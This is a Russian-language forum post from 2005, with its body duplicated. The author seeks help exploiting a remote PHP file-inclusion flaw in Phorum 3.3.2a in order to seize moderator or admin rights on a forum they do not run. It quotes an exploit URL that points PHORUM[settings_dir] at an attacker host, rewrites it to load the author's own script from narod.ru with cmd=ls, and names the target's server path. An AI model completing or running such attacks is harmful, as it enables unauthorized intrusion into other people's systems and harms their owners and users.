SarDoX
30.12.2005, 15:55
фоумок нашел.на секлабе к нему есть пара сплоитов
один из них(по идее должен работать и на 3,3,1)
Phorum 3.3.2a (http://www.phorum.org)
(http://www.pomorsu.ru/doc/opennet/opennet/base/cgi/1022054483_222.txt.html)
внедрение произвольного PHP кода в plugin.php. Пример:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= http://[evilhost]&cmd=ls
создал: http://ftpserver1.narod.ru/replace.php
вопрос: как будет выглядеть полностью строчка
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ftpserver1.narod.ru/replace.php&cmd=ls
гм.. что писать в setting dir?.
случняком напоролся при узучении, возможно мне поможет(где лежит форум...)
/home/forumgames/
--------------
если через эту уязвимость не проникну, тогда что посоветуете?
п..с все, что надо - получить права модера, т..к на одном нашем форуме модера и админа просто нет(трудно в это поверить..). форум активный очень, но засранный.но что б получить права модера, нужны скорее всего будут права админа.
один из них(по идее должен работать и на 3,3,1)
Phorum 3.3.2a (http://www.phorum.org)
(http://www.pomorsu.ru/doc/opennet/opennet/base/cgi/1022054483_222.txt.html)
внедрение произвольного PHP кода в plugin.php. Пример:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= http://[evilhost]&cmd=ls
создал: http://ftpserver1.narod.ru/replace.php
вопрос: как будет выглядеть полностью строчка
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ftpserver1.narod.ru/replace.php&cmd=ls
гм.. что писать в setting dir?.
случняком напоролся при узучении, возможно мне поможет(где лежит форум...)
/home/forumgames/
--------------
если через эту уязвимость не проникну, тогда что посоветуете?
п..с все, что надо - получить права модера, т..к на одном нашем форуме модера и админа просто нет(трудно в это поверить..). форум активный очень, но засранный.но что б получить права модера, нужны скорее всего будут права админа.